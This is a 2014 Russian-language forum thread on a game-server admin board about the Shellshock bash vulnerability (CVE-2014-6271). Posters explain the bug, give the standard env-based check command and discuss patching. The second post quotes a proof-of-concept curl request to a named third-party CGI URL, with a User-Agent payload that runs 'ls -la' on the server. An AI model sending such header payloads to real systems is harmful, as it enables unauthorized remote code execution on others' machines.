Дырища в bash - Форум администраторов игровых серверов
Форум администраторов игровых серверов StormWall - Защита от DDos атак
Регистрация Мнения Справка Сообщество Календарь
Вернуться   Форум администраторов игровых серверов > Разное / Other > Курилка / Yak floor

Курилка / Yak floor
Свободное общение, рассуждения на любые интересные вам темы.

Ответ
Опции темы
Непрочитано 26.09.2014, 01:03   #1
Аватар для n3k0nation
Antihero

Автор темы (Топик Стартер) Дырища в bash

Опубликованы подробности уязвимости CVE-2014-6271 в bash, которая позволяет злоумышленнику произвести удалённое выполнение кода.

Уязвимость возможна благодаря одной из особенностей bash - использования переменных окружения для экспорта функций (если в переменной содержится "() {", то её содержимое будет интерпретировано как функция). Проблема заключается в том, что обработка продолжается даже после символа «}», поэтому, если добавить любую команду — она будет выполнена. Атаке подвержены sshd, Git и Subversion (при определённых обстоятельствах), Apache с mod_cgi или mod_cgid (если скрипты CGI написаны на bash или вызывают bash-скрипты), клиенты DHCP (если они вызывают скрипты для настройки системы), CUPS и вообще любые приложения, которые запускают bash (или bash-скрипты) и могут устанавливать переменные окружения на основе данных, полученных извне.

Для проверки наличия уязвимости в системе можно выполнить команду

Код:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Если система уязвима, в консоль будут выведены строки «vulnerable» и «this is a test», а при отсутствии уязвимости, сообщение об ошибке вида

Код:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
Обновление с исправлением уязвимости уже выпущено для некоторых популярных дистрибутивов.

Кроме того, объявлено об исправлении множественных уязвимостей в пакетном менеджере APT. Уязвимости CVE-2014-0487, CVE-2014-0490, CVE-2014-0488 и CVE-2014-0489 позволяют обойти проверку цифровых подписей пакетов и репозиториев, а уязвимость CVE-2014-6273 - выполнение произвольного кода, отправленного злоумышленником, вмешавшимся в трафик.


Proof: lor
А ты %username% уже обновил свой баш?

Когда прочитал данную новость, немного офигел. Пришлось подрываться и обновлять сервера
Рано я радовался... Обход патча -> opennetПротестил на дебе, уже закрыли. Арч - решето.
__________________
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
n3k0nation вне форума Ответить с цитированием
Непрочитано 26.09.2014, 01:13   #2
Аватар для n3k0nation
Antihero

Автор темы (Топик Стартер) Re: Дырища в bash

Цитата:
Сообщение от ReanimatoR Посмотреть сообщение
парни погодите я в процессе...


Если кому интересно вот вам PoC пример

curl http://g(антигугол)otds.ru/geto(антигугол)s.cgi -A '() { x;};echo;/bin/ls -la'

Я тут весь на панике и ты еще подливаешь масла в огонь Протестил обход у себя - уже пофиксили. Хоть что-то радует.
Пришлось на арче погасить веб сервак. Надеюсь, что завтра пофиксят.
__________________
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
n3k0nation вне форума Ответить с цитированием
Непрочитано 30.09.2014, 06:29   #3
Аватар для n3k0nation
Antihero

Автор темы (Топик Стартер) Re: Дырища в bash

"теперь скрипты секурнее на c++ накатать" (с) anonymous

Очередная дырка в баше... Я уже устал обновляться. В дебиане все пучком.
Proof: lor
__________________
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
n3k0nation вне форума Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как сделать чтоб все игроки вначале стартовали в столицах qwertyuiopas World of WarCraft 4 11.07.2009 22:47


© 2007–2024 «Форум администраторов игровых серверов»
Защита сайта от DDoS атак — StormWall
Работает на Булке неизвестной версии с переводом от zCarot
Текущее время: 07:56. Часовой пояс GMT +3.

Вверх